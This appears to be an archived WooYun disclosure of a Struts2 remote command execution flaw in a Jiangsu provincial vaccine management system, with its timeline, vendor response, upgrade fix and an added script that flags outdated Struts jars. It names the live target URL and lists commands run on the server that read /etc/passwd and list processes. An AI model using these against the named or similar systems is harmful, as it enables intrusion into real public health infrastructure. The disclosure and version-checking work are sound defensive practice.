
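Vulnerability summary

Bug ID: wooyun-2013-036262

Title: Remote command execution vulnerability in the Jiangsu Province Vaccine Management Information System

Vendor: Jiangsu Provincial Center for Disease Control and Prevention

Author: hollies

Submitted: 2013-09-06 12:18

Fixed: 2013-10-21 12:19

Published: 2013-10-21 12:19

Vulnerability type: Command execution

Severity: High

Self-assessed rank: 15

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]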



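Vulnerability details

Disclosure status:

2013-09-06: Details reported to the vendor; awaiting vendor handling
2013-09-10: Vendor confirmed; details disclosed to the vendor only
2013-09-20: Details disclosed to core white hats and experts in related fields
2013-09-30: Details disclosed to regular white hats
2013-10-10: Details disclosed to intern white hats
2013-10-21: Details disclosed to the public

Brief description:

Apache Struts2 remote command execution vulnerability in the Jiangsu Province Vaccine Management Information System

Detailed description:

Jiangsu Province Vaccine Management Information System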
http://218.94.1.82/biology/rss.action
cat /etc/passwd

Proof of vulnerability:

ps -ef

Remediation:

Upgrade to the latest Struts version, 2.3.15.1 or later
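One way to check that the upgrade has reached every deployed application, as an added example that is not part of the original report: the script below walks a deployment directory and lists `struts2-core` jars older than 2.3.15.1, both unpacked and inside `.war` files. It assumes the jars keep their upstream `struts2-core-<version>.jar` file names; the function names and the sample tree are constructed for illustration.

```python
import re
import tempfile
import zipfile
from pathlib import Path

MIN_FIXED = (2, 3, 15, 1)  # minimum version named in the report's fix section
# Assumption: the jar keeps its upstream name, struts2-core-<version>.jar
JAR_RE = re.compile(r"struts2-core-(\d+(?:\.\d+)*)\.jar$")


def check_name(name):
    """Return (version, is_outdated) for a struts2-core jar name, else None."""
    m = JAR_RE.search(name)
    if not m:
        return None
    parts = [int(p) for p in m.group(1).split(".")]
    # Pad to four fields so 2.3.15 compares below 2.3.15.1
    padded = tuple(parts + [0] * (4 - len(parts)))
    return m.group(1), padded < MIN_FIXED


def scan(root):
    """List outdated struts2-core jars under root, unpacked or inside .war files."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        hit = check_name(path.name)
        if hit and hit[1]:
            findings.append((rel, hit[0]))
        elif path.suffix.lower() == ".war" and zipfile.is_zipfile(path):
            with zipfile.ZipFile(path) as war:
                for member in war.namelist():
                    hit = check_name(member)
                    if hit and hit[1]:
                        findings.append((f"{rel}!{member}", hit[0]))
    return findings


def demo():
    """Run scan() over a constructed tree (empty placeholder jars, not real ones)."""
    with tempfile.TemporaryDirectory() as tmp:
        for app, ver in (("old", "2.3.14"), ("fixed", "2.3.15.1")):
            lib = Path(tmp, app, "WEB-INF", "lib")
            lib.mkdir(parents=True)
            (lib / f"struts2-core-{ver}.jar").touch()
        with zipfile.ZipFile(Path(tmp, "packed.war"), "w") as war:
            war.writestr("WEB-INF/lib/struts2-core-2.1.8.1.jar", b"")
        return scan(tmp)
```

A file name is only a hint: a renamed or repackaged jar will not be caught, so treat an empty result as a starting point and confirm the version from the jar's manifest or the build's dependency list.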

Copyright notice: please credit the source when reposting: hollies@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 6

Confirmed: 2013-09-10 23:43

Vendor reply:

Latest status:

None